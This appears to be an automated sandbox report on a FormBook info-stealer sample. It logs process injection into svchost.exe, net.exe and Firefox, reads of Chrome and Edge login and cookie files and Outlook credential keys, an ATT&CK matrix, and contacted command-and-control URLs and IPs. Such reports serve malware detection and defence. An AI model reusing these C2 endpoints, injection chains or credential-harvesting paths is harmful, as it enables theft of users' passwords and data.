                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeNtClose: Direct from: 0x77462B6C
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeNtCreateUserProcess: Direct from: 0x7746371CJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeNtWriteVirtualMemory: Direct from: 0x7746490CJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeNtAllocateVirtualMemory: Direct from: 0x774648ECJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeNtQuerySystemInformation: Direct from: 0x774648CCJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeNtQueryVolumeInformationFile: Direct from: 0x77462F2CJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeNtCreateKey: Direct from: 0x77462C6CJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeNtReadVirtualMemory: Direct from: 0x77462E8CJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeNtSetInformationThread: Direct from: 0x77462B4CJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeNtQueryAttributesFile: Direct from: 0x77462E6CJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeNtDeviceIoControlFile: Direct from: 0x77462AECJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeNtOpenSection: Direct from: 0x77462E0CJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeNtCreateFile: Direct from: 0x77462FECJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeNtOpenFile: Direct from: 0x77462DCCJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeNtQueryInformationToken: Direct from: 0x77462CACJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeNtTerminateThread: Direct from: 0x77462FCCJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeNtAllocateVirtualMemory: Direct from: 0x77462BECJump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeNtOpenKeyEx: Direct from: 0x77462B9CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\net.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\net.exeThread register set: target process: 7960Jump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 30BA008Jump to behavior
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0043916A LogonUserW,0_2_0043916A
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_00436431
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\XhAQ0Rk63O.exe"Jump to behavior
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00445DD3
                Source: XhAQ0Rk63O.exe, IislGDEHlLEZDm.exe, 00000003.00000002.3868336055.0000000001141000.00000002.00000001.00040000.00000000.sdmp, IislGDEHlLEZDm.exe, 00000003.00000000.1468432042.0000000001141000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: IislGDEHlLEZDm.exe, 00000003.00000002.3868336055.0000000001141000.00000002.00000001.00040000.00000000.sdmp, IislGDEHlLEZDm.exe, 00000003.00000000.1468432042.0000000001141000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: IislGDEHlLEZDm.exe, 00000003.00000002.3868336055.0000000001141000.00000002.00000001.00040000.00000000.sdmp, IislGDEHlLEZDm.exe, 00000003.00000000.1468432042.0000000001141000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
                Source: XhAQ0Rk63O.exeBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                Source: IislGDEHlLEZDm.exe, 00000003.00000002.3868336055.0000000001141000.00000002.00000001.00040000.00000000.sdmp, IislGDEHlLEZDm.exe, 00000003.00000000.1468432042.0000000001141000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_00410D10 cpuid 0_2_00410D10
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_004223BC
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_004711D2 GetUserNameW,0_2_004711D2
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0042039F __invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,0_2_0042039F
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.1574269815.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3866219592.0000000002E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3863689053.0000000002960000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3866264697.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1574620078.0000000003A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1575222037.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3871219369.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\net.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: XhAQ0Rk63O.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
                Source: XhAQ0Rk63O.exeBinary or memory string: WIN_XP
                Source: XhAQ0Rk63O.exeBinary or memory string: WIN_XPe
                Source: XhAQ0Rk63O.exeBinary or memory string: WIN_VISTA
                Source: XhAQ0Rk63O.exeBinary or memory string: WIN_7

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.1574269815.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3866219592.0000000002E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3863689053.0000000002960000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3866264697.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1574620078.0000000003A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1575222037.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3871219369.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_004741BB
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket,0_2_0046483C
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0047AD92

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		1
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter                		2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets241
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts312
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1550245 Sample: XhAQ0Rk63O.exe Startdate: 06/11/2024 Architecture: WINDOWS Score: 100 31 www.066bet.xyz 2->31 33 www.yushaliu.online 2->33 35 21 other IPs or domains 2->35 39 Multi AV Scanner detection for submitted file 2->39 41 Yara detected FormBook 2->41 43 Machine Learning detection for sample 2->43 45 AI detected suspicious sample 2->45 10 XhAQ0Rk63O.exe 1 2->10         started        signatures3 47 Performs DNS queries to domains with low reputation 31->47 process4 signatures5 57 Writes to foreign memory regions 10->57 59 Maps a DLL or memory area into another process 10->59 61 Switches to a custom stack to bypass stack traces 10->61 63 Contains functionality to detect sleep reduction / modifications 10->63 13 svchost.exe 10->13         started        process6 signatures7 65 Maps a DLL or memory area into another process 13->65 16 IislGDEHlLEZDm.exe 13->16 injected process8 dnsIp9 25 www.pluribiz.life 209.74.64.58, 49721, 49722, 49723 MULTIBAND-NEWHOPEUS United States 16->25 27 ppp84k45ss7ehy8ypic5x.limelightcdn.com 23.106.59.18, 49749, 49750, 49751 LEASEWEB-UK-LON-11GB United Kingdom 16->27 29 8 other IPs or domains 16->29 37 Found direct / indirect Syscall (likely to bypass EDR) 16->37 20 net.exe 13 16->20         started        signatures10 process11 signatures12 49 Tries to steal Mail credentials (via file / registry access) 20->49 51 Tries to harvest and steal browser information (history, passwords, etc) 20->51 53 Modifies the context of a thread in another process (thread injection) 20->53 55 2 other signatures 20->55 23 firefox.exe 20->23         started        process13

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                XhAQ0Rk63O.exe75%ReversingLabsWin32.Trojan.AutoitInject
                XhAQ0Rk63O.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.4nk.education/gnvu/0%Avira URL Cloudsafe
                http://www.vnxoso88.art/d26j/?A60d=yTdTvK6nwd7fLzOfAFK44iBGWUg6tisBFi4nbiSuwNVJLrY4NtXgfJKYD2NhiKrdBAMHfcdZvgkmH1tO/OhN3m5Pan90DEVx2dAgRBkFBhEuf5ZPCqUAEh8OTzHmZFBqDA==&QftlZ=CnaPg8j0%Avira URL Cloudsafe
                https://whois.gandi.net/en/results?search=4nk.education0%Avira URL Cloudsafe
                http://www.evoo.website/293d/0%Avira URL Cloudsafe
                http://www.yushaliu.online/fjsq/?A60d=GpZrYQXTa/T8sVztsMzbTqF8lxxIC07IkIuZnLhPq18W1QYyx74IZS8PtaR6C0AcFpyS8tKbrMRis2tA9BeSZEPIXc/cFilHIaBazWG3FiJEFNWk2bg6JB0HDDUtnLYhkw==&QftlZ=CnaPg8j0%Avira URL Cloudsafe
                http://www.corpseflowerwatch.org/yjfe/?A60d=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRYp294ngYYiGslw49G10KSSL4+0zLG2YUwGZkJDIt8ktcvA==&QftlZ=CnaPg8j0%Avira URL Cloudsafe
                http://www.vehiculargustav.click/95c0/0%Avira URL Cloudsafe
                http://www.marketprediction.app0%Avira URL Cloudsafe
                http://www.fiqsth.vip/0m8a/0%Avira URL Cloudsafe
                http://www.wukong.college/9ezc/0%Avira URL Cloudsafe
                http://www.vnxoso88.art/d26j/0%Avira URL Cloudsafe
                https://whois.gandi.net/en/results?search=astorg-group.info0%Avira URL Cloudsafe
                http://www.migraine-massages.pro/ym43/0%Avira URL Cloudsafe
                http://www.yushaliu.online/sk-logabpstatus.php?a=OGs3TzBFWW1ya0l1U1JtY2lBQTZqZElWK1FuVzRYVjB2clVPR0c0%Avira URL Cloudsafe
                http://www.4nk.education/gnvu/?A60d=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4FhnX66OqoqX9RpA5jutgMYieahfkhQyed5OXn1sKSNeZ5Og==&QftlZ=CnaPg8j0%Avira URL Cloudsafe
                http://www.evoo.website/293d/?QftlZ=CnaPg8j&A60d=7bOTn4s4CK+jD9JxCOvk7GPe7C1JF/pOmj70YCSuK3OR6e0KuyF5TSw/saz3rP1zPyqrHIRHHBHNYmPna8SGRb4J0orjC0OEaNIQeyVbD4LqlGxYuRKPk3SC/Id1jS91tA==0%Avira URL Cloudsafe
                http://www.wukong.college/9ezc/?QftlZ=CnaPg8j&A60d=xtzn0DJhGGCFi+NFPE3T6Cy+g21HMhjej1Dx0a13Tc/qv05ju/V7yVyPB0RA699858ofq0RXC37Z8DQM9/J+Pd9/3gTJl/Aqae97oJsSOpJi/Ea/U3//DCXx5U5lNSou+g==0%Avira URL Cloudsafe
                http://www.kdtzhb.top/1iqa/0%Avira URL Cloudsafe
                http://www.yushaliu.online/fjsq/0%Avira URL Cloudsafe
                http://www.fiqsth.vip/0m8a/?A60d=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAp7faj8lfUqZu5U5j35YEbCksI5bqMK6zFCmtbYf508vfTQ==&QftlZ=CnaPg8j0%Avira URL Cloudsafe
                http://www.kdtzhb.top/1iqa/?A60d=EIYp+2qno3OyA6JRko7EkEQRXSdht8qBodEq6zBYd0MwR3tzbR3TIlddc30TsymXBRZ2l1bBHfxTXhxkRZRQhWC34rDkgUmQuOVrwdU4dvabP7OAcppow6eveUPberj5Ig==&QftlZ=CnaPg8j0%Avira URL Cloudsafe
                http://www.yushaliu.online/px.js?ch=10%Avira URL Cloudsafe
                http://www.pluribiz.life/afcr/0%Avira URL Cloudsafe
                http://www.migraine-massages.pro/ym43/?A60d=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRRotDS7tV9/yFnz3DJaYsKbhs+4gmff4HURwuAtNrFLN6oA==&QftlZ=CnaPg8j0%Avira URL Cloudsafe
                http://www.yushaliu.online/px.js?ch=20%Avira URL Cloudsafe
                http://www.astorg-group.info/vdvc/0%Avira URL Cloudsafe
                http://www.bio-thymus.com/ezyn/0%Avira URL Cloudsafe
                http://www.astorg-group.info/vdvc/?A60d=5MdYmwdbGD0BDYmaOdq/odi9Xn3PsoNjMQAWnbwvceTCKyge8o8IPCpC1t6KQbJzoNOqWqsbTcqy0exGkczReOZAYqscKe8aXj18ECqhEbYKMceViC9DOJ/t3u5W+eFfLA==&QftlZ=CnaPg8j0%Avira URL Cloudsafe
                http://www.marketprediction.app/ucmb/0%Avira URL Cloudsafe
                http://www.bio-thymus.com/ezyn/?A60d=JlwzIZwI1xJFqouTAqQiGi5FnZJep/DAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMLO8/BWEb4M0fVL3Jy75+c2YHHmj0ZqdnbhQxCwgxfTHy3A==&QftlZ=CnaPg8j0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                webredir.vip.gandi.net
                		217.70.184.50
                		truefalse
                  		high
                  fiqsth.vip
                  		3.33.130.190
                  		truefalse
                    		unknown
                    bio-thymus.com
                    		3.33.130.190
                    		truefalse
                      		unknown
                      www.pluribiz.life
                      		209.74.64.58
                      		truefalse
                        		unknown
                        corpseflowerwatch.org
                        		3.33.130.190
                        		truefalse
                          		unknown
                          www.evoo.website
                          		128.65.195.180
                          		truefalse
                            		unknown
                            www.wukong.college
                            		47.52.221.8
                            		truefalse
                              		unknown
                              marketprediction.app
                              		3.33.130.190
                              		truefalse
                                		unknown
                                www.yushaliu.online
                                		208.91.197.27
                                		truefalse
                                  		unknown
                                  vnxoso88.art
                                  		66.29.146.14
                                  		truefalse
                                    		unknown
                                    www.kdtzhb.top
                                    		47.242.89.146
